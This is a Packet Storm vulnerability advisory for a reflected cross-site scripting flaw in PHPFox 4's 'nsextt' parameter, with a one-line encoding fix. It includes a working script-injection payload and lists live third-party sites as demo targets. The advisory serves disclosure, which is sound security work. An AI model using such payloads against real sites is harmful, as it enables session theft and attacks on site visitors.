PHPFox 4 Cross Site Scripting

2016-06-09T00:00:00
ID PACKETSTORM:137388
Type packetstorm
Reporter bl4ck_MohajeM
Modified 2016-06-09T00:00:00

Description

                                        
                                            `###########################################  
# Title : PhpFox4 Cross Site Scripting Vuln.  
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)  
# Software Link: http://www.phpfox.com/  
# Version: 4  
# Date : 06/09/2016  
# Category: WebApps  
# Tested with : Ubuntu / Win  
###########################################  
[Description]  
  
In this Cms theres is a Cross Site Scripting Vurlnerablities in  
'nsextt' Parameter .  
PhpFox Get the value of this parameter from the Client without any php  
function Ani-XSS Function.  
Vuln. Input ==> /?nsextt=  
  
###########################################  
[Proof of Concept]  
  
Add this Instead of '/?nsextt='  
/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
Then you wanna see the alert that cotain '209'  
  
###########################################  
[Example]  
  
https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E  
https://v4.phpfox.com/blog/  
https://v4.phpfox.com/photo/  
https://v4.phpfox.com/forum/  
https://v4.phpfox.com/poll/  
https://v4.phpfox.com/quiz/  
https://v4.phpfox.com/event/  
https://v4.phpfox.com/music/  
https://v4.phpfox.com/marketplace/  
https://v4.phpfox.com/pages/  
https://v4.phpfox.com/invite/  
  
  
  
  
  
demo :  
tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>  
  
  
###########################################  
[Solution]  
  
Programmer should encode those data we gain from Clients .  
###########################################  
tnx : sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD -  
shabgard - b3hz4d  
  
###########################################  
`